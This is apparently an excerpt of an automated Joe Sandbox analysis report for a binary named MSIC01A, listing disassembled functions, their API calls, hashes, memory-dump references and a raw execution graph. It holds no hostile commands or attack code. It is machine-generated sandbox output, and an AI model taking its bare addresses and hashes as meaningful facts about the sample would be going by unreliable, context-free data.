                                                                                                                                                                        • Instruction Fuzzy Hash: 7551C3B1A143049BDB24EFA4CC45BEEB7B5FF45724F10451DE801A7280DBB5A984EBA0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00F4D4FA Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 130COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • __EH_prolog3_GS.LIBCMT ref: 00F4D501
                                                                                                                                                                        • _swprintf.LIBCMT ref: 00F4D573
                                                                                                                                                                          • Part of subcall function 00F4254E: __EH_prolog3.LIBCMT ref: 00F42555
                                                                                                                                                                          • Part of subcall function 00F4254E: std::_Lockit::_Lockit.LIBCPMT ref: 00F4255F
                                                                                                                                                                          • Part of subcall function 00F4254E: std::_Lockit::~_Lockit.LIBCPMT ref: 00F425D0
                                                                                                                                                                          • Part of subcall function 00F42FC8: __EH_prolog3.LIBCMT ref: 00F42FCF
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: H_prolog3Lockitstd::_$H_prolog3_Lockit::_Lockit::~__swprintf
                                                                                                                                                                        • String ID: %.0Lf
                                                                                                                                                                        • API String ID: 3050236999-1402515088
                                                                                                                                                                        • Opcode ID: ca0ecb6e588e30e2991599fc05f69a9c8f4c55c6cc1ea41b832adc33e984b927
                                                                                                                                                                        • Instruction ID: 54d6bc20734adda167996007d55e0a1b1a5fcf2dded29e76ef36e6e59942cb57
                                                                                                                                                                        • Opcode Fuzzy Hash: ca0ecb6e588e30e2991599fc05f69a9c8f4c55c6cc1ea41b832adc33e984b927
                                                                                                                                                                        • Instruction Fuzzy Hash: 74416972E00208ABCF05EFE4CC45AED7BB5FB08314F208449E845AB295EB799915EF91
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00F4D79E Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 130COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • __EH_prolog3_GS.LIBCMT ref: 00F4D7A5
                                                                                                                                                                        • _swprintf.LIBCMT ref: 00F4D817
                                                                                                                                                                          • Part of subcall function 00F38610: std::_Lockit::_Lockit.LIBCPMT ref: 00F38657
                                                                                                                                                                          • Part of subcall function 00F38610: std::_Lockit::_Lockit.LIBCPMT ref: 00F38679
                                                                                                                                                                          • Part of subcall function 00F38610: std::_Lockit::~_Lockit.LIBCPMT ref: 00F386A1
                                                                                                                                                                          • Part of subcall function 00F38610: std::_Lockit::~_Lockit.LIBCPMT ref: 00F3880E
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3__swprintf
                                                                                                                                                                        • String ID: %.0Lf
                                                                                                                                                                        • API String ID: 1487807907-1402515088
                                                                                                                                                                        • Opcode ID: 2574dca44130a95da32d0e0b121ee40522de5db3cedffec1c75620d5430a54a2
                                                                                                                                                                        • Instruction ID: 3d2d3c6906d21ae752078375b394561f0407c76a3086619004a5e655f3bd44ea
                                                                                                                                                                        • Opcode Fuzzy Hash: 2574dca44130a95da32d0e0b121ee40522de5db3cedffec1c75620d5430a54a2
                                                                                                                                                                        • Instruction Fuzzy Hash: 7D416972E00308ABCF05DFD4DC45AEE7BB5FB08310F208449E945AB295EB399915EF90
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00F51887 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 128COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • __EH_prolog3_GS.LIBCMT ref: 00F5188E
                                                                                                                                                                        • _swprintf.LIBCMT ref: 00F51900
                                                                                                                                                                          • Part of subcall function 00F39270: std::_Lockit::_Lockit.LIBCPMT ref: 00F392A0
                                                                                                                                                                          • Part of subcall function 00F39270: std::_Lockit::_Lockit.LIBCPMT ref: 00F392C2
                                                                                                                                                                          • Part of subcall function 00F39270: std::_Lockit::~_Lockit.LIBCPMT ref: 00F392EA
                                                                                                                                                                          • Part of subcall function 00F39270: std::_Lockit::~_Lockit.LIBCPMT ref: 00F39422
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3__swprintf
                                                                                                                                                                        • String ID: %.0Lf
                                                                                                                                                                        • API String ID: 1487807907-1402515088
                                                                                                                                                                        • Opcode ID: 97fbf1766d9bd759b39759efd7bb179f76832808aac6d653b4868bea0191c611
                                                                                                                                                                        • Instruction ID: e3fb1121e732e19040d1d7a2378361600c1cfd4eb7bac8e54304a6986067a845
                                                                                                                                                                        • Opcode Fuzzy Hash: 97fbf1766d9bd759b39759efd7bb179f76832808aac6d653b4868bea0191c611
                                                                                                                                                                        • Instruction Fuzzy Hash: D9416872E00208ABCF05DFD4CC54ADD7BB5FF08311F208549E956AB291DB79AA19EF90
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00F56059 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 00F5607E
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: EncodePointer
                                                                                                                                                                        • String ID: MOC$RCC
                                                                                                                                                                        • API String ID: 2118026453-2084237596
                                                                                                                                                                        • Opcode ID: 6fe09968ef61dc34d205fecb5fbfb5ea40e1e932f57a947b368772b8ed934edb
                                                                                                                                                                        • Instruction ID: fac77c736c70cd524441625ddf2f4a97f3befc87d1abe2dadc758b11973ab9cc
                                                                                                                                                                        • Opcode Fuzzy Hash: 6fe09968ef61dc34d205fecb5fbfb5ea40e1e932f57a947b368772b8ed934edb
                                                                                                                                                                        • Instruction Fuzzy Hash: F5418831D00609EFCF15DF98CC81AAEBBB6BF08311F188158FE18A7252D3399954EB50
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00F4DF8F Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: H_prolog3___cftoe
                                                                                                                                                                        • String ID: !%x
                                                                                                                                                                        • API String ID: 855520168-1893981228
                                                                                                                                                                        • Opcode ID: 826f9ff01f41c2348e8f6cde7de7c48a8b565be0b8bb9adc0685f8b6e840c9c3
                                                                                                                                                                        • Instruction ID: d1f51bb882d5159283e69f32e07dab1cddc9589a650cac6eab93433c4b75d484
                                                                                                                                                                        • Opcode Fuzzy Hash: 826f9ff01f41c2348e8f6cde7de7c48a8b565be0b8bb9adc0685f8b6e840c9c3
                                                                                                                                                                        • Instruction Fuzzy Hash: 11318B71D0020DEBDF04DF98E881AEEBBB6FF48314F104419F905A7251DB79AA49DB64
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00F519FA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: H_prolog3___cftoe
                                                                                                                                                                        • String ID: !%x
                                                                                                                                                                        • API String ID: 855520168-1893981228
                                                                                                                                                                        • Opcode ID: ee0aa8fd6db1a64965e9bbc616a427f0016edf76033f2694c67caf1cc178f137
                                                                                                                                                                        • Instruction ID: 09744c04664cd3f027451f50d36265e08ce6fe851eb23ad5b87494e88b3d52a5
                                                                                                                                                                        • Opcode Fuzzy Hash: ee0aa8fd6db1a64965e9bbc616a427f0016edf76033f2694c67caf1cc178f137
                                                                                                                                                                        • Instruction Fuzzy Hash: 4A315A32D15258AFEF01DF98DC41BEEBBB5BF09311F100019F944A7242D779AA49EBA0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00F35F40 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • ConvertSidToStringSidW.ADVAPI32(?,00000000), ref: 00F35F86
                                                                                                                                                                        • LocalFree.KERNEL32(00000000,Invalid SID,0000000B,?,00000000,72A902E8), ref: 00F35FF6
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ConvertFreeLocalString
                                                                                                                                                                        • String ID: Invalid SID
                                                                                                                                                                        • API String ID: 3201929900-130637731
                                                                                                                                                                        • Opcode ID: 2a2d9031059db65da200d6e9f5a466c4b523c256c1f999b7ce5acddb383f24ed
                                                                                                                                                                        • Instruction ID: f9de7a073d5be384f166f447d1e8f3002abe3b47d4f42f60c35e88cddef5f632
                                                                                                                                                                        • Opcode Fuzzy Hash: 2a2d9031059db65da200d6e9f5a466c4b523c256c1f999b7ce5acddb383f24ed
                                                                                                                                                                        • Instruction Fuzzy Hash: ED21C070A047199BDB14DF68C815BAFBBF8FF44B24F10451EE405A7380D7B9AA049BD1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00F39070 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00F3909B
                                                                                                                                                                        • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00F390FE
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: std::_$Locinfo::_Locinfo_ctorLockitLockit::_
                                                                                                                                                                        • String ID: bad locale name
                                                                                                                                                                        • API String ID: 3988782225-1405518554
                                                                                                                                                                        • Opcode ID: b6672fcc79595a3920c9a233e232318889c22252fc1276031014371e63d37fe6
                                                                                                                                                                        • Instruction ID: 39be322fdf4d2a96a7d4467f1ee3a306f89ca62395949371f4395ae0dd7f21ce
                                                                                                                                                                        • Opcode Fuzzy Hash: b6672fcc79595a3920c9a233e232318889c22252fc1276031014371e63d37fe6
                                                                                                                                                                        • Instruction Fuzzy Hash: 1321C370805784DED721CF68C90478BBFF4EF15710F10869ED49597781D7B9A604D7A1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00F3F098 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: H_prolog3_
                                                                                                                                                                        • String ID: false$true
                                                                                                                                                                        • API String ID: 2427045233-2658103896
                                                                                                                                                                        • Opcode ID: 6991ca4f5cf482074d95bbafa9318eac4364ef6c3e82ac7de85e8d92b766e746
                                                                                                                                                                        • Instruction ID: 0d093a449356a8607a440341b52527694960ecc4940a971a6568a5795e2e671e
                                                                                                                                                                        • Opcode Fuzzy Hash: 6991ca4f5cf482074d95bbafa9318eac4364ef6c3e82ac7de85e8d92b766e746
                                                                                                                                                                        • Instruction Fuzzy Hash: E311D3B1D40B80AFC724EFB4D841B8ABBF4AF05310F04C51AE592DB241EB74E608EB91
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00F34070 Relevance: 5.2, APIs: 4, Instructions: 189memoryCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • LocalFree.KERNEL32(00000000,00F34261,00F74400,000000FF,72A902E8,00000000,?,00000000,?,?,?,00F74400,000000FF,?,00F33A75,?), ref: 00F34096
                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,40000022,72A902E8,?,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00F34154
                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,3FFFFFFF,72A902E8,?,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00F34177
                                                                                                                                                                        • LocalFree.KERNEL32(?,?,?,?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00F34217
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Local$AllocFree
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2012307162-0
                                                                                                                                                                        • Opcode ID: 8bd96ceb466858fd9de0e686483de91653dbf8c714341a4d1fad151aa90c16d2
                                                                                                                                                                        • Instruction ID: be474dc0c234308dd2e1be3567ee9f8499df09279fdee96d84a1dc7adb201af1
                                                                                                                                                                        • Opcode Fuzzy Hash: 8bd96ceb466858fd9de0e686483de91653dbf8c714341a4d1fad151aa90c16d2
                                                                                                                                                                        • Instruction Fuzzy Hash: 3F519DB1A006059FDB18DF68C985AAEBBB5FB48360F14462DE929E7380D734FD44DB90
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00F31D80 Relevance: 5.2, APIs: 4, Instructions: 171memoryCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,80000022,00000000,?,00000000), ref: 00F31E01
                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,7FFFFFFF,00000000,?,00000000), ref: 00F31E21
                                                                                                                                                                        • LocalFree.KERNEL32(7FFFFFFE,?,00000000), ref: 00F31EA7
                                                                                                                                                                        • LocalFree.KERNEL32(00000001,72A902E8,00000000,00000000,00F73C40,000000FF,?,00000000), ref: 00F31F2D
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Local$AllocFree
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2012307162-0
                                                                                                                                                                        • Opcode ID: 003d15609ea4b1fa49dbd6d9c783b8d96cbdea036ef8c8a7619670f19be2b016
                                                                                                                                                                        • Instruction ID: 951de30956ca153643b851778e3459de1d7b758b036e31c76f4b8adfd608b9ff
                                                                                                                                                                        • Opcode Fuzzy Hash: 003d15609ea4b1fa49dbd6d9c783b8d96cbdea036ef8c8a7619670f19be2b016
                                                                                                                                                                        • Instruction Fuzzy Hash: F251E172A082159FC715EF28DC40A6ABBE8FB49370F110A2EF916D7290DB71E9449791
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Execution Graph

                                                                                                                                                                        Execution Coverage:4.2%
                                                                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                        Signature Coverage:0.1%
                                                                                                                                                                        Total number of Nodes:1637
                                                                                                                                                                        Total number of Limit Nodes:35
                                                                                                                                                                        execution_graph 75494 7ff738a4acec 75497 7ff738a4a360 75494->75497 75499 7ff738a4a3a3 75497->75499 75498 7ff738a4a420 75499->75498 75501 7ff738a4b9e0 75499->75501 75504 7ff738a4afb0 75501->75504 75507 7ff738a58b40 75504->75507 75508 7ff738a58b73 75507->75508 75509 7ff738a58b60 75507->75509 75511 7ff738a58b7b 75508->75511 75512 7ff738a58b8e 75508->75512 75516 7ff738a5ca40 75509->75516 75526 7ff738a5c230 75511->75526 75530 7ff738a5d9e0 75512->75530 75514 7ff738a4affa 75514->75499 75517 7ff738a5ca60 75516->75517 75521 7ff738a5cb15 75516->75521 75518 7ff738a5cad6 75517->75518 75523 7ff738a5cb21 75517->75523 75538 7ff738a58c90 GetLastError 75518->75538 75520 7ff738a5cfc2 75520->75521 75548 7ff738a5af30 GetLastError VirtualQuery VirtualFree SetLastError 75520->75548 75521->75514 75523->75520 75523->75521 75525 7ff738a5d074 75523->75525 75525->75521 75544 7ff738a5a720 75525->75544 75528 7ff738a5c260 75526->75528 75529 7ff738a5c2e0 75528->75529 75549 7ff738a5a3f0 75528->75549 75529->75514 75531 7ff738a5da01 75530->75531 75532 7ff738a5da0d 75530->75532 75531->75514 75533 7ff738a5dab6 75532->75533 75534 7ff738a5ca40 4 API calls 75532->75534 75533->75531 75535 7ff738a5c230 6 API calls 75533->75535 75534->75533 75536 7ff738a5dcff memcpy_s 75535->75536 75536->75531 75537 7ff738a5ca40 4 API calls 75536->75537 75537->75531 75542 7ff738a58cb2 75538->75542 75539 7ff738a58cbe VirtualQuery 75541 7ff738a58cd9 75539->75541 75539->75542 75540 7ff738a58d65 SetLastError 75540->75541 75541->75521 75542->75539 75542->75540 75542->75541 75543 7ff738a58d18 VirtualFree 75542->75543 75543->75541 75543->75542 75547 7ff738a5a76b 75544->75547 75545 7ff738a5aecf 75545->75521 75546 7ff738a58c90 4 API calls 75546->75547 75547->75545 75547->75546 75548->75521 75550 7ff738a5a436 75549->75550 75551 7ff738a5a421 75549->75551 75554 7ff738a5a443 75550->75554 75559 7ff738a58bb0 GetLastError VirtualAlloc SetLastError 75550->75559 75555 7ff738a58e60 75551->75555 75554->75529 75556 7ff738a58e94 75555->75556 75558 7ff738a58e9e 75555->75558 75561 7ff738a58c20 GetLastError VirtualAlloc SetLastError 75556->75561 75558->75550 75560 7ff738a58bf3 75559->75560 75560->75554 75562 7ff738a58c63 75561->75562 75562->75558 75563 7ff738a32c6e 75564 7ff738a32e9e 75563->75564 75565 7ff738a32ca4 75563->75565 75731 7ff738a3aca0 75564->75731 75594 7ff738a81750 75565->75594 75599 7ff738a81160 75565->75599 75612 7ff738a7f900 75565->75612 75624 7ff738a76c50 75565->75624 75629 7ff738a36950 75565->75629 75668 7ff738a77000 75565->75668 75679 7ff738a76ce0 75565->75679 75688 7ff738a746d0 75565->75688 75707 7ff738a80300 75565->75707 75711 7ff738a806d0 75565->75711 75723 7ff738a76b80 75565->75723 75567 7ff738a32dd7 75568 7ff738a32cb0 75568->75567 75569 7ff738a32d98 75568->75569 75570 7ff738a33098 75568->75570 75581 7ff738a3273d 75568->75581 75569->75567 75577 7ff738a3aca0 _free_nolock 15 API calls 75569->75577 75576 7ff738a34978 75570->75576 75578 7ff738a3aca0 _free_nolock 15 API calls 75570->75578 75579 7ff738a34941 75570->75579 75574 7ff738a34ac4 75575 7ff738a35066 75754 7ff738a870e0 17 API calls 75576->75754 75577->75569 75578->75570 75581->75570 75582 7ff738a3aca0 _free_nolock 15 API calls 75581->75582 75753 7ff738a32420 17 API calls 2 library calls 75581->75753 75582->75581 75755 7ff738a85910 75594->75755 75600 7ff738a81173 __ExceptionPtrDestroy 75599->75600 75781 7ff738a858b0 75600->75781 75603 7ff738a811f2 __ExceptionPtrDestroy 75606 7ff738ab0960 17 API calls 75603->75606 75604 7ff738a811ac 75794 7ff738a7ef20 17 API calls __ExceptionPtrDestroy 75604->75794 75608 7ff738a811f0 std::rsfun 75606->75608 75607 7ff738a811bb __ExceptionPtrDestroy 75795 7ff738ab0960 75607->75795 75785 7ff738a4b7a0 75608->75785 75611 7ff738a81255 _wcsupr_s _mbsncpy_s 75611->75568 75613 7ff738a7f913 __ExceptionPtrDestroy 75612->75613 75834 7ff738a7edf0 75613->75834 75617 7ff738a7f94f __ExceptionPtrDestroy 75618 7ff738a7f97f 75617->75618 75619 7ff738a7fa1b 75617->75619 75848 7ff738a52250 15 API calls 2 library calls 75617->75848 75618->75568 75850 7ff738a7f5c0 96 API calls 4 library calls 75619->75850 75622 7ff738a7fa05 75622->75619 75849 7ff738a40fa0 15 API calls std::rsfun 75622->75849 75885 7ff738a75d50 75624->75885 75628 7ff738a76c76 75628->75568 75630 7ff738a3698b 75629->75630 75631 7ff738a369bd 75630->75631 75632 7ff738a369a5 75630->75632 75634 7ff738a369ed 75631->75634 76030 7ff738a3cb50 15 API calls _free_nolock 75631->76030 76029 7ff738a351e0 59 API calls _wcsupr_s 75632->76029 75975 7ff738a48020 75634->75975 75636 7ff738a369d7 76031 7ff738a3d5e0 75636->76031 75639 7ff738a36a06 75988 7ff738a35690 75639->75988 75643 7ff738a36a77 75996 7ff738a366b0 75643->75996 75644 7ff738a36a4d 75644->75643 75655 7ff738a369aa 75644->75655 76040 7ff738a35500 57 API calls _wcsupr_s 75644->76040 75648 7ff738a36ace 75650 7ff738a36af0 75648->75650 75653 7ff738a36b06 